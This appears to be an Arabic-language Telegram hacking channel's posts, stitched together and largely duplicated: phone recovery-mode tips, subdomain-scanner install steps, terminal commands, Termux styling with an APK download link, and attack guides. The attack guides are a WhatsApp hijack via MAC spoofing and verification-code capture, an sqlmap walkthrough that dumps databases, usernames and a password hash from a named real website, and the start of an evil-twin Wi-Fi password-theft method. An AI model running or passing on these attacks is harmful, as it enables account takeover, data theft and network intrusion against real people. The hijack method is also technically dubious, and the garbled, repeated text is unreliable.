تضعيف مستوى الصوت و بنفس
الملاحظات و التحذيرات
🔵 لا يمكن استخدام هذه الطريقة
على أجهزة tab لعدم وجود زر
القائمة
🔵 عند الدخول على نظام آندرويد لا
يكون لمس الهاتف يعمل
---------
ثانيا : نظام آيفون :
تفيد في عمل سوفت وير و فك الرمز و إعادة ضبط المصنع و مسح ذاكرة التخزين المؤقت و مسح ذاكرة التخزين الداخلية و تهيئة كرت الذاكرة
كما أنه يمكن جعل الهاتف يعمل باللمس عن بعد أو التعديل على ملفات النظام أو إستعادة ملفات أو تشغيل الهاتف دون عمل شيئ .
----------
🔴 استخدم نفس طريقة آندرويد
لآيفون و كل أجهزة آبل تقريبا
⚠ نفس تحذيرات آندرويد تنطبق
على آيفون
🔵 نفس ملاحظات آندرويد تنطبق
على آيفون
----------
ثالثا : نظام نوكيا :
⁉ الطريقة :
( تصلح لأجهزة النوكيا التي تحوي
أزرار )
🔴 إيقاف تشغيل
🔴 اضغط مطولا على زر التشغيل و
زر ال ok و زر ال # و ال 3
🔴 لقد دخلت على نظام النوكيا
---------
⁉ التحذيرات :
⚠ لا يوجد سوى خيار السوفت وير
⚠ لا يجب استخدام الطريقة إلا إذا
كان شحن الهاتف 70% أو أكثر
⚠ لا يجب إزالة البطارية أبدا أثناء
عمل السوفت وير قد يؤدي ذلك
إلى حدوث فشل في نظام الهاتف
أو حدوث الأخطاء......
⚠ عند الدخول إلى هذه المرحلة لا
يمكنك عمل شيئ و لا حتى إجراء
مكالمة الطوارئ
--------
⁉ ملاحظات :
🔵 للخروج من هذه المرحلة اضغط
زر التشغيل
🔵 لتأكيد عمل السوفت وير اضغط زر
Ok
🔵 هذه الطريقة لإصدارات أجهزة
النوكيا القديمة ذات الأزرار
-------
رابعا : نظام الحاسوب :
تفيد في عمل سوفت وير و فك الرمز و إعادة ضبط المصنع و مسح ذاكرة التخزين المؤقت و مسح ذاكرة التخزين الداخلية و تهيئة كرت الذاكرة
أو الفلاشة أو القرص الليزري
كما أنه يمكن أو التعديل على ملفات النظام أو إستعادة ملفات أو تشغيل الهاتف دون عمل شيئ
أو عمل هذه الأشياء لأي جهاز متصل بالحاسوب .
-----
⁉ الطريقة :
🔴 إيقاف تشغيل
🔴 اضغط زر التشغيل مع زر f 11
مع f 12
🔴 انتظر قليلا ثم أزل يدك من على
زر التشغيل
🔴 انتظر قليلا ثم أزل يدك من على
الزرين الباقيين
🔴 فتظهر شاشة زرقاء ثم يعطيك
خيارات
🔴 و هكذا تكون قد دخلت على نظام
الحاسوب
-------
⚠ تحذيرات آندرويد تنطبق على
الحاسوب
-----
⁉ ملاحظات :
🔵 للتنقل بين الخيارات الأسهم و لتأكيد استخدام زر enter و للخروجاستعمل زر التشغيل
☠☠☠☠☠☠☠☠☠☠
👍2
تثبيت اداة
KnockPy
Installation :
$ apt update && apt upgrade
$ apt install git
$ apt install python2
$ apt install python
$ pip2 install dnspython
$ git clone https://github.com/guelfoweb/knock.git
$ cd knock $ python2 setup.py install
تشغيل الاداة
$ knockpy -h
KnockPy
Installation :
$ apt update && apt upgrade
$ apt install git
$ apt install python2
$ apt install python
$ pip2 install dnspython
$ git clone https://github.com/guelfoweb/knock.git
$ cd knock $ python2 setup.py install
تشغيل الاداة
$ knockpy -h
GitHub
GitHub - guelfoweb/knockpy: Knock Subdomain Scan
Knock Subdomain Scan. Contribute to guelfoweb/knockpy development by creating an account on GitHub.
اوامر Terminal مفيدة للمطورين
الـ Terminal يعتبر من اقوى الادوات التي اذا اتقنت استخدامها وتعاملت معها بالشكل المطلوب فإنها ستسرع عملك, وتعتبر اسرع بمراحل من الواجهات الرسومية GUI لكثير من البرامج, لذلك في هذه المقالة ساقوم بسرد بعض الاوامر المفيدة والتي تعتبر الاكثر استخداماً وشيوعاً بين المطورين.
فتح ملف بواسطة المتصفح
1
open index.html
هذا الاختصار سيفتح لك اي ملف في المتصفح الافتراضي لجهازك, سواء كان الـ Safari or Chrome.
إنشاء ملف جديد
1
2
touch index.html
touch one.html two.html three.html
من افضل الطرق لإنشاء ملف او عدة ملفات في مجلد ما.
إنشاء مجلد جديد
1
mkdir test && cd $_
اختصار بسيط يقوم بإنشاء مجلد جديد وينقلك لداخله مباشرة.
عرض محتويات الملف
1
less index.html
يوجد عدة طرق لعرض محتويات اي ملف ولكن اسهلها هو باستخدام الامر less فمن خلال هذا الامر تستطيع عرض محتويات الملف وتستطيع استخدام الامر b و f لانتقال بين اسطر الملف وايضا تستطيع استخدام الامر / للبحث عن عبارة معينه او استخدم q للخروج من الملف.
فتح مجلد في finder (لمستخدمين Mac)
1
open .
امر بسيط تستطيع من خلاله فتح اي مجلد في مستعرض الملفات (Finder) .
تحميل ملف باستخدام Crul
1
curl -O http://www.domain.com/path/to/download.tar.gz
امر بسيط تستطيع من خلاله تحميل اي ملف بدون استخدام المتصفح.
عرض تفاصيل اي امر
1
man ls
من خلال امر man تستطيع عرض تفاصيل اي امر مع شرح مبسط له وطريقة استخدامه.
سِجل الاوامر المدخلة
1
history
اثناء استخدامك للـ Terminal قد تستخدم العديد من الاومر فإذا اردت الرجوع الى اي امر واردت مشاهدة سِجل لجميع الاوامر التي قمت بكتابتها فقط استخدم الامر history
حذف محتويات الملف
1
<em class="markup--em markup--pre-em">cat /dev/null > test.html</em>
هذا الامر يسمح لك بحذف جميع محتويات الملف ولكن بدون حذف الملف نفسه, بمعنى اخر سيقوم بجعل الملف فارغ.
ترتيب الملفات بناء على الحجم
1
ls -lSr
امر بسيطة لترتيب او عرض قائمة الملفات ومرتبه بحسب الحجم.
عرض المجلدات فقط
1
ls -d */
ان كان لديك مجلد وبداخله مجموعة مجلدات وملفات وتريد عرض المجلدات فقط فاستخدم الامر السابق.
تفريغ الـ Terminal
1
clear
الامر clear يحذف جميع الاومر الموجودة في نافذة الـ Terminal الحالية.
انشاء عدة ملفات بامتداد واحد
1
touch {user,age,location,height}.js
اذا اردت انشاء مجموعة ملفات تحمل امتداد واحد ولتكن مثلا .php او .js فتستطيع استخدام الطريقة السابقة.
فتح ملف باستخدام Sublime
1
subl index.html
برنامج Sublime الغني عن التعريف هو من اجمل المحررات لمختلف اللغات, فاذا اردت فتح اي ملف باستخدامه فقط قم بكتابة الامر subl وبعدها اسم الملف ( طريقة اعداده )
الـ Terminal يعتبر من اقوى الادوات التي اذا اتقنت استخدامها وتعاملت معها بالشكل المطلوب فإنها ستسرع عملك, وتعتبر اسرع بمراحل من الواجهات الرسومية GUI لكثير من البرامج, لذلك في هذه المقالة ساقوم بسرد بعض الاوامر المفيدة والتي تعتبر الاكثر استخداماً وشيوعاً بين المطورين.
فتح ملف بواسطة المتصفح
1
open index.html
هذا الاختصار سيفتح لك اي ملف في المتصفح الافتراضي لجهازك, سواء كان الـ Safari or Chrome.
إنشاء ملف جديد
1
2
touch index.html
touch one.html two.html three.html
من افضل الطرق لإنشاء ملف او عدة ملفات في مجلد ما.
إنشاء مجلد جديد
1
mkdir test && cd $_
اختصار بسيط يقوم بإنشاء مجلد جديد وينقلك لداخله مباشرة.
عرض محتويات الملف
1
less index.html
يوجد عدة طرق لعرض محتويات اي ملف ولكن اسهلها هو باستخدام الامر less فمن خلال هذا الامر تستطيع عرض محتويات الملف وتستطيع استخدام الامر b و f لانتقال بين اسطر الملف وايضا تستطيع استخدام الامر / للبحث عن عبارة معينه او استخدم q للخروج من الملف.
فتح مجلد في finder (لمستخدمين Mac)
1
open .
امر بسيط تستطيع من خلاله فتح اي مجلد في مستعرض الملفات (Finder) .
تحميل ملف باستخدام Crul
1
curl -O http://www.domain.com/path/to/download.tar.gz
امر بسيط تستطيع من خلاله تحميل اي ملف بدون استخدام المتصفح.
عرض تفاصيل اي امر
1
man ls
من خلال امر man تستطيع عرض تفاصيل اي امر مع شرح مبسط له وطريقة استخدامه.
سِجل الاوامر المدخلة
1
history
اثناء استخدامك للـ Terminal قد تستخدم العديد من الاومر فإذا اردت الرجوع الى اي امر واردت مشاهدة سِجل لجميع الاوامر التي قمت بكتابتها فقط استخدم الامر history
حذف محتويات الملف
1
<em class="markup--em markup--pre-em">cat /dev/null > test.html</em>
هذا الامر يسمح لك بحذف جميع محتويات الملف ولكن بدون حذف الملف نفسه, بمعنى اخر سيقوم بجعل الملف فارغ.
ترتيب الملفات بناء على الحجم
1
ls -lSr
امر بسيطة لترتيب او عرض قائمة الملفات ومرتبه بحسب الحجم.
عرض المجلدات فقط
1
ls -d */
ان كان لديك مجلد وبداخله مجموعة مجلدات وملفات وتريد عرض المجلدات فقط فاستخدم الامر السابق.
تفريغ الـ Terminal
1
clear
الامر clear يحذف جميع الاومر الموجودة في نافذة الـ Terminal الحالية.
انشاء عدة ملفات بامتداد واحد
1
touch {user,age,location,height}.js
اذا اردت انشاء مجموعة ملفات تحمل امتداد واحد ولتكن مثلا .php او .js فتستطيع استخدام الطريقة السابقة.
فتح ملف باستخدام Sublime
1
subl index.html
برنامج Sublime الغني عن التعريف هو من اجمل المحررات لمختلف اللغات, فاذا اردت فتح اي ملف باستخدامه فقط قم بكتابة الامر subl وبعدها اسم الملف ( طريقة اعداده )
👍3
بسم الله الرحمن الرحيم والسلام علىكم ورحمة الله تعالى وبركاته الًيَوُمًِ معنا شرح اختراق الوتساب عن طريق برنامج Terminal Emulator
إن تطبيقات المليار مشترك أو مستخدم كالفيسبوك والواتساب والتي تحتل المراكز الأولى في مواقع التواصل الإجتماعي ليس لها حماية شاملة وفي أية لحظة تتعرض لثغرة لهذا في هذا الدرس سوف نتعرف على طريقة إختراق الواتساب بطريقة سهلة جدا فقط تابع الشرح
الطريقة الأولى
في هذه المرحلة نحتاج الـ MAC address لهاتف الضحية وبرنامج BusyBox app و Terminal emulator. التطبيقات توجد في متجر PLAY وعند تثبيت المتطلبات الثلاث فأنت جاهز لبدء العملية القرصنة.
قم بتحميل وتثبيت BusyBox app وسيطلب منك عمل حساب. قم بعمل الحساب ثم الدخول
أدخل الى جهاز الضحية وخذ الـ MAC address بالطريقة التالية : “Settings> About Phone> Status> MAC Address.
الآن سنقوم بإستخدام Terminal emulator.
افتح Terminal emulator وقم بكتابة $ su. ثم اضغط ENTER
2. ثم اكتب “$ busybox iplink show eth0 ″ ثم ENTER
اذا حصلت على هذه الرسالة “device not found” , اكتب wlan0 instead of eth0 في المساحة المتاحة
3. في الخطوة التالية اكتب “$ busybox ifconfig eth0 hw ether” وبعدها اكتب الـ MAC address بهذا الشكل XX:XX:XX:XX:XX:XX الآن لتتأكد من أن عملية الاختراق على أنها جرت بشكل صحيح اذهب الى الواتساب وقم بتسجيل رقم الضحية الخاص بحسابه على واتساب ومن ثم اطلب التأكيد من خلال مكالمة تأكيد (call verification) واكتب الكود المعطى وقم بادخاله وستسطيع استقبال الرسائل القادمة اليه والاطلاع على جميع رسائله.
إن تطبيقات المليار مشترك أو مستخدم كالفيسبوك والواتساب والتي تحتل المراكز الأولى في مواقع التواصل الإجتماعي ليس لها حماية شاملة وفي أية لحظة تتعرض لثغرة لهذا في هذا الدرس سوف نتعرف على طريقة إختراق الواتساب بطريقة سهلة جدا فقط تابع الشرح
الطريقة الأولى
في هذه المرحلة نحتاج الـ MAC address لهاتف الضحية وبرنامج BusyBox app و Terminal emulator. التطبيقات توجد في متجر PLAY وعند تثبيت المتطلبات الثلاث فأنت جاهز لبدء العملية القرصنة.
قم بتحميل وتثبيت BusyBox app وسيطلب منك عمل حساب. قم بعمل الحساب ثم الدخول
أدخل الى جهاز الضحية وخذ الـ MAC address بالطريقة التالية : “Settings> About Phone> Status> MAC Address.
الآن سنقوم بإستخدام Terminal emulator.
افتح Terminal emulator وقم بكتابة $ su. ثم اضغط ENTER
2. ثم اكتب “$ busybox iplink show eth0 ″ ثم ENTER
اذا حصلت على هذه الرسالة “device not found” , اكتب wlan0 instead of eth0 في المساحة المتاحة
3. في الخطوة التالية اكتب “$ busybox ifconfig eth0 hw ether” وبعدها اكتب الـ MAC address بهذا الشكل XX:XX:XX:XX:XX:XX الآن لتتأكد من أن عملية الاختراق على أنها جرت بشكل صحيح اذهب الى الواتساب وقم بتسجيل رقم الضحية الخاص بحسابه على واتساب ومن ثم اطلب التأكيد من خلال مكالمة تأكيد (call verification) واكتب الكود المعطى وقم بادخاله وستسطيع استقبال الرسائل القادمة اليه والاطلاع على جميع رسائله.
السلام عليكم 📢
اليوم ضمن شروحات تيرموكس - TERMUX
' تغيير واجهة التيرموكس واضافة ستايلات واسمك على خلفية الواجهة
تابع...
- @Cyper_Th
----
خطوة الاولى : نقوم بتحميل تطبيق TERMUX - STYLE ساقوم بوضعه اسفل الشرح تقوم بتحميله وتثبيته
خطوة الثانية : نقوم بدخول الى التيرموكس وكتابة هذه الاوامر لتحميل اداوات لازمة
تابع...
1- pkg install cowsay
2- pkg install nano
3- pkg install toilet
خطوة الثالثة : قم بالخروج من تطبيق تيرموكس ثم قم بدخول اليه مرة اخرى
خطوة الرابعة : تقوم بكتابة هذه الاوامر بالحرف لا تنقص منه حرف
تابع الخطوات ....
1- cd ..
2- cd usr
3- cd etc
4- nano bash.bashrc
----
/data/data/com.termux/files/usr/libexec/termux/comm$
}
سيظهر لك بهذا الشكل 👆
تقوم بضغط انتر مرتين عند اشارة }
وتكتب
clear
ثم قم بضغط انتر مرتين وكتابة هذا الامر
toilet -f standard -F gay ARMANDO
بدال ( name ) اكتب الاسم الذي تريده👆✅
ثم قم بضغط انتر مرتين وكتابة الامر الثاني
cowsay -f eyes V_J_S_ARMANDO
بدال ( name ) اكتب اسم الذي تريده👆✅
وثم قم بضغط على زر خفض الصوت بهاتفك مع حرف الx
وسيطلب منك الحفظ قم بضغط حرف y وثم انتر
والان يمكنك خروج من تطبيق ودخول اليه مرة اخرى سترى ان الواجهة تغيرت وفيها اشكال رائعة مع اسمك
والان يمكنك تغيير لون الاحرف وايضا شكل الاحرف او الfont
عبر الضغط مطولا على شاشة وثم ضغط على more وسيظهر لك كلمة style بالاسفل قم بضغط عليه ومن خلاله يمكنك تغيير لون الاحرف وايضا شكل الخط FONT باجمل ستايلات ...
تحميل تطبيق termux-style 📥
https://up.top4top.net/downloadf-8685vf7v1-apk.html
----
وهكذا انتهينا من الشرح نتمنى انكم استفدتم من الشرح
اليوم ضمن شروحات تيرموكس - TERMUX
' تغيير واجهة التيرموكس واضافة ستايلات واسمك على خلفية الواجهة
تابع...
- @Cyper_Th
----
خطوة الاولى : نقوم بتحميل تطبيق TERMUX - STYLE ساقوم بوضعه اسفل الشرح تقوم بتحميله وتثبيته
خطوة الثانية : نقوم بدخول الى التيرموكس وكتابة هذه الاوامر لتحميل اداوات لازمة
تابع...
1- pkg install cowsay
2- pkg install nano
3- pkg install toilet
خطوة الثالثة : قم بالخروج من تطبيق تيرموكس ثم قم بدخول اليه مرة اخرى
خطوة الرابعة : تقوم بكتابة هذه الاوامر بالحرف لا تنقص منه حرف
تابع الخطوات ....
1- cd ..
2- cd usr
3- cd etc
4- nano bash.bashrc
----
/data/data/com.termux/files/usr/libexec/termux/comm$
}
سيظهر لك بهذا الشكل 👆
تقوم بضغط انتر مرتين عند اشارة }
وتكتب
clear
ثم قم بضغط انتر مرتين وكتابة هذا الامر
toilet -f standard -F gay ARMANDO
بدال ( name ) اكتب الاسم الذي تريده👆✅
ثم قم بضغط انتر مرتين وكتابة الامر الثاني
cowsay -f eyes V_J_S_ARMANDO
بدال ( name ) اكتب اسم الذي تريده👆✅
وثم قم بضغط على زر خفض الصوت بهاتفك مع حرف الx
وسيطلب منك الحفظ قم بضغط حرف y وثم انتر
والان يمكنك خروج من تطبيق ودخول اليه مرة اخرى سترى ان الواجهة تغيرت وفيها اشكال رائعة مع اسمك
والان يمكنك تغيير لون الاحرف وايضا شكل الاحرف او الfont
عبر الضغط مطولا على شاشة وثم ضغط على more وسيظهر لك كلمة style بالاسفل قم بضغط عليه ومن خلاله يمكنك تغيير لون الاحرف وايضا شكل الخط FONT باجمل ستايلات ...
تحميل تطبيق termux-style 📥
https://up.top4top.net/downloadf-8685vf7v1-apk.html
----
وهكذا انتهينا من الشرح نتمنى انكم استفدتم من الشرح
top4top.io
8685vf7v1.apk | تحميل
مركز رفع و تحميل صور وملفات صوتية ومرئية بروابط مباشرة وأحجام ضخمة للأبد مع إمكانية إدارة ملفاتك، من الأشهر على مستوى الخليج والعالم العربي
ls /system/bin am
2- أوامر خاصة بتشغيل الصوتيات:
amix aplay
3-أوامر خاصة بالتسجيل الصوتي:
arec
4- مدير النسخ الاحتياطي - نوع الأمر في حد ذاته للحصول على الوثائق
bmgr
5-تغيير تاثيرات اقلاع الهاتف/ قد يحتم عليك اعادة تشغيل الاندرويد:
bootanimation
6-انسخ محتويات الملف إلى الإخراج القياسي
brcm_patchram_plus
bugreport
cat
7- تغيير صيغة الملف (على سبيل المثال، ما إذا كان يمكن mp3 أو txt.)
chmod
8-مقارنة ملفين :
cmp
9- اظهار التاريخ والوقت الحالي تلقائيا:
Date
7-ادارة جميع مساحات الداكرة الموجودة :
debuggerd
dexopt
df
8-اظهار الاعدادات الصحيحة للشبكات (البلوتوت ,الواي فاي ...)
dhcpcd dmesg dnsmasq dumpstate dumpsys dvz fsck_msdos gdbserver getevent getprop gzip hciattach hd id ifconfig
9- إظهار العمليات الحالية باستخدام واجهات الشبكة (أعلى، ولكن للشبكات)
iftop
10-إدارة جدار الحماية :
ime input insmod installd ioctl ionice iptables
11-إرسال إشارات إلى العمليات:
keystore
keystore_cli
kill
12-قائمة الملفات:
logwrapper
ls
13-قائمة العمليات النشطة:
nandread ndc netcfg netd netstat newfs_msdos notify omx_tests pand ping pm pppd printenv ps
14-التحكم بوضعية الجهاز :
qemu-props qemud racoon radiooptions reboot
15-اعداد وقت الايقاف و التشغيل التلقائي لوظائف الاندرويد:
rmmod route rtp_test run-as schedtest schedtop sdcard sdptool sendevent service servicemanager setconsole setprop setup_fs sh showlease sleep smd stagefright start
16-اظهار اكثر المستهلكات للمعالج:
surfaceflinger svc sync system_server tc testid3 toolbox top
2- أوامر خاصة بتشغيل الصوتيات:
amix aplay
3-أوامر خاصة بالتسجيل الصوتي:
arec
4- مدير النسخ الاحتياطي - نوع الأمر في حد ذاته للحصول على الوثائق
bmgr
5-تغيير تاثيرات اقلاع الهاتف/ قد يحتم عليك اعادة تشغيل الاندرويد:
bootanimation
6-انسخ محتويات الملف إلى الإخراج القياسي
brcm_patchram_plus
bugreport
cat
7- تغيير صيغة الملف (على سبيل المثال، ما إذا كان يمكن mp3 أو txt.)
chmod
8-مقارنة ملفين :
cmp
9- اظهار التاريخ والوقت الحالي تلقائيا:
Date
7-ادارة جميع مساحات الداكرة الموجودة :
debuggerd
dexopt
df
8-اظهار الاعدادات الصحيحة للشبكات (البلوتوت ,الواي فاي ...)
dhcpcd dmesg dnsmasq dumpstate dumpsys dvz fsck_msdos gdbserver getevent getprop gzip hciattach hd id ifconfig
9- إظهار العمليات الحالية باستخدام واجهات الشبكة (أعلى، ولكن للشبكات)
iftop
10-إدارة جدار الحماية :
ime input insmod installd ioctl ionice iptables
11-إرسال إشارات إلى العمليات:
keystore
keystore_cli
kill
12-قائمة الملفات:
logwrapper
ls
13-قائمة العمليات النشطة:
nandread ndc netcfg netd netstat newfs_msdos notify omx_tests pand ping pm pppd printenv ps
14-التحكم بوضعية الجهاز :
qemu-props qemud racoon radiooptions reboot
15-اعداد وقت الايقاف و التشغيل التلقائي لوظائف الاندرويد:
rmmod route rtp_test run-as schedtest schedtop sdcard sdptool sendevent service servicemanager setconsole setprop setup_fs sh showlease sleep smd stagefright start
16-اظهار اكثر المستهلكات للمعالج:
surfaceflinger svc sync system_server tc testid3 toolbox top
👍2
شرح اختراق مواقع بستعمال sqlmap
بسم الله الرحمن الرحيم
السلام عليكم ورحمة الله وبركاته
الكل يعرف انه ثغرات sql
من اقوى واكثر الثغرات انتشارا واحيانا تاخذ وقت في عملية الأستهداف ولاكن الان تستطيع استهداف المواقع المصابة بكل سرعة
اسم الأداة :sqlmap
لغة البرمجة : python
الأن كيفية استخدام الاداة في عملية الحقن
اولا : استخراج اسماء قواعد البيانات
لنقل ان هذا الموقع مصاب بثغرة sql
كود:
http://www.bcspeakers.com/page.php?id=22
وكلنا نعرف كيفية الفحص وهي باضافة ' الى نهاية الرابط واذا وجد خطأ كان الموقع مصاب
الأن الأمر المستخدم في استخراج القواعد لهذا الموقع
كود:
python sqlmap.py -u http://www.bcspeakers.com/page.php?id=22 --dbs
النتيجة
كود:
available databases [2]:
[*] information_schema
[*] www-bcspeakerstest
مثل ما شفتو تم استخراج القواعد والان القاعدة المستهدفة هي " www-bcspeakerstest"
ثانيا : استخراج الجداول
القاعدة المستهدفة هي " www-bcspeakerstest"
سوف يكون الأمر بهذا الشكل
كود:
python sqlmap/sqlmap.py -u http://www.bcspeakers.com/page.php?id=22 -D www-bcspeakerstest --tables
والنتيجة كبيرة لن اضعها لانها تتكون من 59 جدول على كل حال انا وجدت الجدول المستهدف وهو "_user"
ثالثا : استخراج الأعمدة
الان نأتي الى استخراج الأعمدة الموجودة في جدول "_user"
الكود كالتالي
كود:
python sqlmap/sqlmap.py -u http://www.bcspeakers.com/page.php?id=22 -D www-bcspeakerstest -T _user --columns
والنتيجة كالتالي
كود:
+----------+---------------------------+
| Column | Type |
+----------+---------------------------+
| id_user | int(10) unsigned zerofill |
| password | text |
| username | text |
+----------+---------------------------+
كما ترون الأعمدة المستهدفة هي
password
username
رابعا : اسخراج البيانات من الاعمدة
العمود الاول هو عامود اسم المستخدم "username" سوف يكون الكود كالتالي
كود:
python sqlmap/sqlmap.py -u http://www.bcspeakers.com/page.php?id=22 -D www-bcspeakerstest -T _user -C username --dump
النتيجة
كود:
+--------------+
| username |
+--------------+
| becspeak2803 |
| becspeak2803 |
+--------------+
كما ترون استخرجنا اسم المستخدم
والان نأتي الى استخراج الباسورود
اكود مثل السابق مع تغيير اسم العامود الى عامود الباسوورد
كود:
python sqlmap/sqlmap.py -u http://www.bcspeakers.com/page.php?id=22 -D www-bcspeakerstest -T _user -C password --dump
سوف تسألك الأداة اذا كنت تريد محاولة مقارنة الهاش مع قاعدة البيانات المرفقة باالأداة
كود:
recognized possible password hash values. do you want to use dictionary attack on retrieved table items? [Y/n/q]
تختار مثل ما نت عاوز
انا اخترت لا لتسريع العملية والنتيجة كالتالي
كود:
+----------------------------------+
| password |
+----------------------------------+
| 286adae502ad9d5ab8c4f8644050b448 |
| 286adae502ad9d5ab8c4f8644050b448 |
+----------------------------------+
كما ترون تم استخراج البيانات بسرعة كبيرة
بسم الله الرحمن الرحيم
السلام عليكم ورحمة الله وبركاته
الكل يعرف انه ثغرات sql
من اقوى واكثر الثغرات انتشارا واحيانا تاخذ وقت في عملية الأستهداف ولاكن الان تستطيع استهداف المواقع المصابة بكل سرعة
اسم الأداة :sqlmap
لغة البرمجة : python
الأن كيفية استخدام الاداة في عملية الحقن
اولا : استخراج اسماء قواعد البيانات
لنقل ان هذا الموقع مصاب بثغرة sql
كود:
http://www.bcspeakers.com/page.php?id=22
وكلنا نعرف كيفية الفحص وهي باضافة ' الى نهاية الرابط واذا وجد خطأ كان الموقع مصاب
الأن الأمر المستخدم في استخراج القواعد لهذا الموقع
كود:
python sqlmap.py -u http://www.bcspeakers.com/page.php?id=22 --dbs
النتيجة
كود:
available databases [2]:
[*] information_schema
[*] www-bcspeakerstest
مثل ما شفتو تم استخراج القواعد والان القاعدة المستهدفة هي " www-bcspeakerstest"
ثانيا : استخراج الجداول
القاعدة المستهدفة هي " www-bcspeakerstest"
سوف يكون الأمر بهذا الشكل
كود:
python sqlmap/sqlmap.py -u http://www.bcspeakers.com/page.php?id=22 -D www-bcspeakerstest --tables
والنتيجة كبيرة لن اضعها لانها تتكون من 59 جدول على كل حال انا وجدت الجدول المستهدف وهو "_user"
ثالثا : استخراج الأعمدة
الان نأتي الى استخراج الأعمدة الموجودة في جدول "_user"
الكود كالتالي
كود:
python sqlmap/sqlmap.py -u http://www.bcspeakers.com/page.php?id=22 -D www-bcspeakerstest -T _user --columns
والنتيجة كالتالي
كود:
+----------+---------------------------+
| Column | Type |
+----------+---------------------------+
| id_user | int(10) unsigned zerofill |
| password | text |
| username | text |
+----------+---------------------------+
كما ترون الأعمدة المستهدفة هي
password
username
رابعا : اسخراج البيانات من الاعمدة
العمود الاول هو عامود اسم المستخدم "username" سوف يكون الكود كالتالي
كود:
python sqlmap/sqlmap.py -u http://www.bcspeakers.com/page.php?id=22 -D www-bcspeakerstest -T _user -C username --dump
النتيجة
كود:
+--------------+
| username |
+--------------+
| becspeak2803 |
| becspeak2803 |
+--------------+
كما ترون استخرجنا اسم المستخدم
والان نأتي الى استخراج الباسورود
اكود مثل السابق مع تغيير اسم العامود الى عامود الباسوورد
كود:
python sqlmap/sqlmap.py -u http://www.bcspeakers.com/page.php?id=22 -D www-bcspeakerstest -T _user -C password --dump
سوف تسألك الأداة اذا كنت تريد محاولة مقارنة الهاش مع قاعدة البيانات المرفقة باالأداة
كود:
recognized possible password hash values. do you want to use dictionary attack on retrieved table items? [Y/n/q]
تختار مثل ما نت عاوز
انا اخترت لا لتسريع العملية والنتيجة كالتالي
كود:
+----------------------------------+
| password |
+----------------------------------+
| 286adae502ad9d5ab8c4f8644050b448 |
| 286adae502ad9d5ab8c4f8644050b448 |
+----------------------------------+
كما ترون تم استخراج البيانات بسرعة كبيرة
👍1
Forwarded from BLACK HAT ISLAMIC (العميلة X)
هجوم التوأم الشرير هذه الطريقة تمكنك من الهجوم على الشبكه وانشاء شبكه وهمية بنفس اسم واي فاي الضحيه واخفاء الشبكه الأصليه للضحيه ايضا سنقوم ببث نفس اسم الشبكه مما يوهم الضحيه انها نفس شبكة الواي فاي wifi ألأصلية
Forwarded from BLACK HAT ISLAMIC (العميلة X)
وحين دخول الضحيه الى الشبكة سوف تلزمه بكتابه باسوورد الحقيقي للشبكة حتى يستطيع الدخول الى شبكة الواي فاي wifi
وعندما يقوم الضحيه بكتابه الرقم السري لشبكة الwifi سوف يصلك الرقم السري الصحيح وبذالك تستطيع اختراق الشبكة بنجاح
وعندما يقوم الضحيه بكتابه الرقم السري لشبكة الwifi سوف يصلك الرقم السري الصحيح وبذالك تستطيع اختراق الشبكة بنجاح
Forwarded from BLACK HAT ISLAMIC (العميلة X)
هذه الطريقة تحتاج الى نظام Kali Linux
Forwarded from BLACK HAT ISLAMIC (العميلة X)
واداة Airgeddon
Forwarded from BLACK HAT ISLAMIC (العميلة X)
اولا نقوم بفتح الترمنال
Forwarded from BLACK HAT ISLAMIC (العميلة X)